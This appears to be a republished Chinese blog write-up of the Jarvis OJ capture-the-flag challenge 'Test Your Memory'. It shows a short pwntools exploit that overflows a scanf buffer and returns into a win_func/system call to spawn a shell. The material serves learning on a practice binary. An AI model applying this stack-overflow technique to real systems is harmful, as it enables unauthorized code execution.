18.9.20 Jarvis OJ PWN----Test Your Memory

其他 2018-10-08 16:22:01 阅读次数: 0

先checksec一下

可以栈溢出

放到IDA里看一下，发现有system函数（在函数with_func中调用），喜出望外，同时搜索字符串时，可以发现打开flag的指令，如下

再看一下哪里可以溢出，在mem_test函数中，scanf就可以溢出

直接上脚本吧

#代码主体

system_addr=bin.symbols['win_func']
payload='a'*(0x13+0x04)+p32(system_addr)+p32(0x080487E0)+p32(0x080487E0)
cn.recvuntil("cff flag go go go ...\n")
cn.recvline()
cn.sendline(payload)
cn.interactive()

猜你喜欢

转载自blog.csdn.net/qq_42192672/article/details/82785272

18.9.20 Jarvis OJ PWN----Test Your Memory

18.9.20 Jarvis OJ PWN----[XMAN]level4

18.9.20 Jarvis OJ PWN----[XMAN]level3(x64)

memory-300——Jarvis OJ

(Jarvis Oj)(Pwn) fm

(Jarvis Oj)(Pwn) Guess

(Jarvis Oj)(Pwn) Smashes

Jarvis OJ Pwn Wp

[JarvisOJ][pwn]Test Your Memory

(Jarvis Oj)(Pwn) level3

Jarvis Oj Pwn 学习笔记-fm

(Jarvis Oj)(Pwn) level0

(Jarvis Oj)(Pwn) Tell Me Something

(Jarvis Oj)(Pwn) level2

(Jarvis Oj)(Pwn) level1

(Jarvis Oj)(Pwn) level5

(Jarvis Oj)(Pwn) level4

18.9.19 Jarvis OJ PWN----Smashes

Jarvis OJ PWN level3

Jarvis OJ PWN level1

Jarvis OJ（PWN）level0

[Jarvis OJ - PWN]——[XMAN]level3

[Jarvis OJ - PWN]——[XMAN]level0

[Jarvis OJ - PWN]——[XMAN]level1

[Jarvis OJ - PWN]——[XMAN]level2

jarvis OJ

(Jarvis Oj)(Pwn) level3_x64

Jarvis Oj Pwn 学习笔记-level2

Jarvis Oj Pwn 学习笔记-level3

Jarvis Oj Pwn 学习笔记-Tell Me Something

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

周排行

浏览器对同一域名进行请求的最大并发连接数

React Hook之自定义Hook

【转】MyBatis缓存机制

-Java-泛型

自动化测试常用脚本-发送邮件

LeetCode#859: Buddy Strings

java、Python处理字符串

第二篇の博客

Hadoop伪分布式环境安装

SQL Server进阶（十一）临时表、表变量

每日归档

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)